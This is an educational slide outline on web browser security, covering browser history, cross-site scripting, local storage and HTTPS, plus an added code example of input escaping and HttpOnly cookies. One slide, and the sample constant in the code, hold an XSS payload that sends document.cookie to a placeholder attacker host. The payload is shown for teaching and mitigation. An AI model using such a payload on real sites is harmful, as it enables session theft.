Web Browser Security
By Robert Sellers, Brian Bauer
Introduction
• Relevance
  • Use Internet daily
  • Transmit personal information, needs to be secure
• Content
  • History
  • Security Issues and Mitigation
  • Protection
History
• First ever browser – WorldWideWeb (1990)
  • Created at CERN by Tim Berners-Lee
  • Used internally, no real security threats
  • Would only display HTML text
  • Allowed downloading of other file types
History
• Mosaic (1993)
  • First browser with a GUI
  • Led to an increase in Internet popularity
• Netscape Navigator (1994)
  • Nearly disappeared by 2000
• Internet Explorer (1995)
  • Held as much as 95% of the market
History
• Safari (2003)
  • Apple’s browser
• Firefox (2004)
  • Open source
• Chrome (2008)
  • Rapid increase in market share
Security Issues
• Increase in security issues
  • Complexity of web sites and browsers
  • Size of the Internet
    • Anyone can access
  • Uses of Internet
    • Online banking
    • Shopping
    • More sharing of sensitive data
Security Issues
• Cross Site Scripting (XSS)
  • Takes advantage of complex, dynamic web pages
  • Injects client side scripts, HTML
  • Can lead to cookie theft, browser redirection, untrusted content
  • Nearly 80% of vulnerabilities in 2007 (Symantec)
Security Issues
• Example
  http://portal.example/index.php?sessionid=12312312&username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>
  • source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting
• XSS Mitigation
  • Disable scripting
  • Sanitize input, escape HTML/scripts
  • No script access to cookies
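The last two XSS Mitigation bullets above, as an added example that is not part of the original slides: a server that echoes the `username` parameter, first unescaped and then escaped, and a session cookie marked HttpOnly. The function names and the sample request are assumptions made for illustration.

```javascript
// Added example: handling of the `username` query parameter on the server.
// escapeHtml, renderGreeting* and sessionCookie are hypothetical helper names.

// Escape the five characters that let text break out of HTML content
// or out of a quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Before: the parameter is concatenated into the page unchanged, so any
// markup it carries is parsed by the browser as part of the page.
function renderGreetingUnsafe(requestUrl) {
  const username = new URL(requestUrl).searchParams.get('username') ?? '';
  return `<p>Welcome, ${username}</p>`;
}

// After: the parameter is escaped for the HTML context it is written into.
function renderGreetingSafe(requestUrl) {
  const username = new URL(requestUrl).searchParams.get('username') ?? '';
  return `<p>Welcome, ${escapeHtml(username)}</p>`;
}

// "No script access to cookies": HttpOnly hides the cookie from
// document.cookie; Secure keeps it off plain-HTTP connections.
function sessionCookie(sessionId) {
  return `sessionid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed request, modelled on the URL shown on the slide.
const SAMPLE_URL = 'http://portal.example/index.php?sessionid=12312312&username=' +
  encodeURIComponent("<script>document.location='http://attackerhost.example/?'+document.cookie</script>");

console.log(renderGreetingUnsafe(SAMPLE_URL)); // script element reaches the page
console.log(renderGreetingSafe(SAMPLE_URL));   // same input shown as inert text
console.log('Set-Cookie: ' + sessionCookie('12312312'));
```

Escaping is context-specific: this helper covers HTML body text and quoted attributes, not values written into script blocks or URLs.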
Security Issues
• Local Storage
  • Form data
  • Login credentials
• Encryption - HTTP vs HTTPS
  • Packet sniffing -> session hijacking, password stealing
Protecting Yourself Online
• Incognito Mode (Google Chrome)
  • Allows user to switch between multiple privacy settings with the click of a button
  • Can be activated in one window/tab but not others
• Browser Guards
  • Modern browsers will prevent users from visiting malicious sites
  • Two main methods
    • List of reported malicious sites
    • Algorithm to detect malicious code on a site
  • This can protect from viruses, phishing, and other threats
Conclusion
• Browsers can only do so much
• Much security is responsibility of web designers
• Internet users should be aware of issues